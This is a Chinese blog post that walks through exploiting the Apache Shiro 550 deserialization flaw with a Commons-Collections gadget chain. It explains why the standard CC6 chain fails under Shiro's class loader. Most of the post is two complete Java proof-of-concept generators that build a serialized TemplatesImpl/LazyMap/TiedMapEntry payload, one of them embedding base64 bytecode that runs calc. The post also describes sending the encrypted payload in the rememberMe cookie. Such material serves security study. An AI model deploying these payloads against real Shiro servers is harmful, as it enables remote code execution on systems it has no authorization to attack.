shiro下的cc链利用

最新推荐文章于 2024-04-24 19:39:21 发布
最新推荐文章于 2024-04-24 19:39:21 发布
阅读量360 收藏 1
点赞数 1
文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jy13172/article/details/131881319
版权

上一篇中也说过,Shiro的依赖中默认是不带CC的依赖的,这里我们给它加上这个依赖

<!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
    <dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
    </dependency>

我们使用CC6链打,他报错了
原因是在反序列化的时候,它调用的不是原生的ObjectInputStream类,而是调用的ClassResolvingObjectInputStream来进行对象的输入,ClassResolvingObjectInputStream是shiro自带的ObjectInputStream

ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
@SuppressWarnings({"unchecked"})
    T deserialized = (T) ois.readObject();
ois.close();

既然是它自己定义的类,那么这里面肯定对对象进行了处理,我们跟进到ClassResolvingObjectInputStream中看看
里面只有2个方法,一个是构造方法,一个是重写了resolveClass方法

 @Override
    protected Class<?> resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {
        try {
            return ClassUtils.forName(osc.getName());
        } catch (UnknownClassException e) {
            throw new ClassNotFoundException("Unable to load ObjectStreamClass [" + osc + "]: ", e);
        }
    }

java原生反序列化的时候会调用resolveClass方法,如果它重写了的话就会调用到重写的resolveClass方法中去
那我们看看原生的java.io.ObjectInputStream#resolveClass方法是怎么写的

 protected Class<?> resolveClass(ObjectStreamClass desc)
        throws IOException, ClassNotFoundException
    {
        String name = desc.getName();
        try {
            return Class.forName(name, false, latestUserDefinedLoader());
        } catch (ClassNotFoundException ex) {
            Class<?> cl = primClasses.get(name);
            if (cl != null) {
                return cl;
            } else {
                throw ex;
            }
        }
 }

在获取名字的时候,return ClassUtils.forName(osc.getName());shiro调用了自己的工具类中的forName方法,我们跟进去查看
image.png
里面调用了三个loadClass,先用线程的类加载器,线程的类加载器加载不到的话再用当前类的类加载器,还是加载不到的话用系统类加载器,实际上就是双亲委派
问题出在:
ClassLoader.loadClass是不能加载数组类的
Class.forName是可以加载数组类的
如果我们不加载数组类的话他是没有问题的,但是加载数组类的话就会产生问题
这个是Tomcat的类加载的细节
tomcat类加载器模型
image.png

我们想要打这个利用链的话,我们就不能使用数组类
在CC2中我们构造的poc是不使用数组类的,所以我们构造poc将CC2,CC3和CC6结合起来

package com.ay;


import org.apache.commons.collections.comparators.TransformingComparator;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.xalan.xsltc.trax.TemplatesImpl;


import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

/**
 * @ClassName TestShiro550
 * @Author aY
 * @Date 2023/3/12 19:32
 * @Description
 */
public class TestShiro550 extends Exception{

    public static void main(String[] args) throws Exception{

        //CC3
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> te = templates.getClass();

        Field namefield = te.getDeclaredField("_name");
        namefield.setAccessible(true);
        namefield.set(templates,"aaaa");
        Field bytecodesield = te.getDeclaredField("_bytecodes");
        bytecodesield.setAccessible(true);

        byte[] code= Files.readAllBytes(Paths.get("D://tmp/Test1.class"));
        byte[][] codes={code};
        //private byte[][] _bytecodes = null;
        bytecodesield.set(templates,codes);//到了代码执行的地方了,需要将执行的命令传进去


        //CC2
        InvokerTransformer InvokerTransformer = new InvokerTransformer("newTransformer", null, null);
        //调用的是TemplatesImpl.newTransformer方法,就可以动态加载类


        //CC6
        HashMap<Object, Object> map = new HashMap<Object, Object>();
        Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));


        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, templates);

        HashMap<Object, Object> map2 = new HashMap<Object, Object>();
        map2.put(tiedMapEntry, "bbb");
        lazymap.remove(templates);

        Class c = LazyMap.class;
        Field factoryfield = c.getDeclaredField("factory");
        factoryfield.setAccessible(true);
        factoryfield.set(lazymap, InvokerTransformer);

        serialize(map2);
        unserialize("ser.bin");


    }


    //封装serialize
    public static void serialize(Object object) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }

    //封装unserialize
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

image.png

使用之前构造好的exp.py将ser.bin进行加密,打开数据包传到Cookie的值哪里然后go,就可以弹出计算器
image.png
poc附上

package com.ay;

/**
 * @ClassName CC10
 * @Author aY
 * @Date 2023/3/12 20:28
 * @Description
 */
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class CC10 {
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void serizlize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
        oos.close();
    }

    public static void main(String[] args) throws Exception {
        //如下的code内容为弹出一个calc。
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "test");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        //新建一个InvokerTransformer对象,先设置一个不容易本地调试出发的方法getClass
        Transformer transformer = new InvokerTransformer("getClass", null, null);

        //新建一个InvokerTransformer对象,先设置一个不容易本地调试出发的方法getClass
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformer);

        //创建一个TiedMapEntry对象,map放如上创建的LazyMap,key放如上创建好的TemplatesImpl
        TiedMapEntry tiedmapentry = new TiedMapEntry(outerMap, obj);

        //创建一个HashSet对象,添加一个foo
        HashSet map = new HashSet(1);
        map.add("foo");

        //反射获取如上创建的map对象的map属性
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }
        f.setAccessible(true);
        HashMap innimpl = null;
        innimpl = (HashMap) f.get(map);

        //反射获取如上HashSet对象中map属性HashMap中的table属性
        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }
        f2.setAccessible(true);

        //新建一个array数组,将获取到的table属性中的值赋给array
        Object[] array = new Object[0];
        array = (Object[]) f2.get(innimpl);

        //新建一个node对象,将如上获取到array中的值赋给node(涉及到hashmap的数组结构原理)
        Object node = array[0];
        if(node == null){
            node = array[1];
        }

        //将如上获取到的HashSet中的map属性中的table中的一个node的key值替换为我们一开始创建的tiedmapentry对象。
        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }
        keyField.setAccessible(true);
        keyField.set(node, tiedmapentry);

        //将上面传入的一个getClass方法替换为我们真实的需要触发的方法newTransformer
        setFieldValue(transformer, "iMethodName", "newTransformer");

        //序列化
        serizlize(map);
    }
}
YY13172
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
shiro无依赖利用
jy13172的博客
07-23 688
我们只要调用它的另一个构造函数,然后调用JDK或者CB自带的类就行了,同时还要满足两个条件,一方面就是继承。我们上次用的CC3的依赖,这次把这个依赖删了,使用shiro自带的依赖打。是嵌套的意思 跟进去发现,readMethod是我们传进去的参数。CC是对java集合类的增强,CB是对JavaBean的增强。虽然是CC4中的类,但是我们在传入系统的时候就把他修改成。是可以动态加载类的,也就是可以代码执行,所以。是我们传的参数,这里很可能是一个可以利用的点。,而且优先队列的参数也是可以控制的。
java安全】无Commons-Collections的Shiro550反序列化利用
leekos的博客,分享web安全相关知识~
08-03 1942
如果两个不同版本的库使用了同一个类,而这两个类可能有一些方法和属性有了变化,此时在序列化通 信的时候就可能因为不兼容导致出现隐患。因此,Java在反序列化的时候提供了一个机制,序列化时会 根据固定算法计算出一个当前类的serialVersionUID值,写入数据流中;反序列化时,如果发现对方的环境中这个类计算出的serialVersionUID不同,则反序列化就会异常退出,避免后续的未知隐患。
Java Shiro反序列化CommonsCollections利用分析
最新发布
qq_44192006的博客
04-24 555
本文主要分析CC1利用,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java反序列化和php反序列化漏洞的区别(希望大家不要有惯性思维认为反序列化漏洞都一样,其实java反序列化和php反序列化的差别还是很大的并介绍了复现学习java反序列化漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用的入口点)三个步骤,讲述利用的构建。纸上得来终觉浅,绝知此事要躬行。
第17篇:Shiro反序列化在Weblogic下无利用的拿权限方法
ABC_123的博客
07-02 2216
Part1 前言Shiro反序列化漏洞虽然出现很多年了,但是在平时的攻防比赛与红队评估项目中还是能遇到。主站也许遇不到Shiro漏洞,但是主站边缘域名、全资子公司的子域名、边缘资产、微信公众号、微信小程序啥的,总能找到。现在遇到的shiro反序列化漏洞也是越来越难了,好多都是别人搞不定的。搞不定的原因要么是key比较偏门,要么是过不了waf防护,要么就是找不到可用的利.........
shiro反序列化漏洞与无依赖CB分析
灰太的表格的博客
02-22 1221
shiro反序列化漏洞与无依赖CB分析
Shiro安全(三):Shiro自身利用之CommonsBeanutils
weixin_43263451的博客
08-05 2167
前面在利用shiro反序列化时,都是利用CC,但是这需要服务端引入CommonsCollections组件。所以最好是找到一条shiro自身的利用,而不需要任何的前提条件在之前曾介绍过,在反序列化这个对象时,为了保证队列顺序,会进行重排序的操作,而排序就涉 及到大小比较,进而执行 java.util.Comparator 接口的 compare() 方法。是否能够找到其他的Comparator呢本文主要是要理解如何在没有CC组件等外部依赖的情况下,找到shiro自身的利用来提高攻击的成功率。...
apche shiro漏洞检测和利用工具
07-30
Shiro命令执行工具 ...摘取xray高级版 xray利用 100+个KEY已注释!!!! 声明:本工具仅供学习使用,禁止任何用于非法途径,如果使用该工具参与非法活动与本人无任何关系,本人不承担任何责任!
shiro反序列化漏洞利用工具
11-09
Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
shiro反序列化漏洞检测工具,含接教程
08-17
shiro反序列化漏洞检测工具,含接教程 [admin@ shiro]java - shiro_tool.jar https://xx.xx.xx.xx/
shiro (下)
09-06
shiro学习(下)ssl、单点登录、OAuth2集成、并发登录人数限制、动态URL权限控制、集成验证码、多项目集中权限管理及分布式对话、在线会话管理
[Java反序列化]—Shiro反序列化(二)
snowlyzz的博客
12-06 523
shiro RCE利用
CC6利用(最好用的CC利用)--EXP编写思路--源码分析
yuan_boss的博客
08-16 206
在这篇文章中,你能更加深刻理解CC利用,并且能学到更深的EXP编写思路当然如果有CC基础的师傅可以放心使用。
Java安全入门(二)——CC1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
告别脚本小子系列丨JAVA安全(6)——反序列化利用(上)
xnxqwzy的博客
09-12 253
我们通常把反序列化漏洞和反序列化利用分开来看,有反序列化漏洞不一定有反序列化利用(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用的反序列化利用)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用,那么平台大概率是不会接受这种漏洞的。反序列化利用是整个反序列化利用过程中最关键的一环,通常反序列化利用需要借助常用的第三方jar包,其中最有名的就是CommonCollections利用(简称CC)。
Javaweb安全——反序列化漏洞-Shiro(CommonsBeanutils利用
weixin_43610673的博客
07-08 1616
先来看一段这个漏洞描述:这里使用的shiro应用demo为https://github.com/phith0n/JavaThings/tree/master/shirodemo测试的jdk版本为8u111 以及 8u211 都试过可以触发。的特征:处理cookie的流程:生成payload的流程:使用shiro内置的类 org.apache.shiro.crypto.AesCipherService进行AES加密,先要找到硬编码的key,然后写一个exp生成payload。key的位置位于(shiro...
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3353
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
Java反序列化 CC4利用记录
LTianHang的博客
02-07 216
Java反序列化 CC4利用记录
Javaweb安全——反序列化漏洞-CC&CB思路整理
weixin_43610673的博客
10-28 2286
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》中Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
shiro反序列化利用
07-29
Shiro 反序列化利用是一种攻击技术,利用 Apache Shiro 框架中的漏洞,通过序列化和反序列化的过程来执行恶意代码。这种攻击方式通常被用来绕过身份验证和授权机制,获取未经授权的访问权限。 具体来说,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YY13172

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值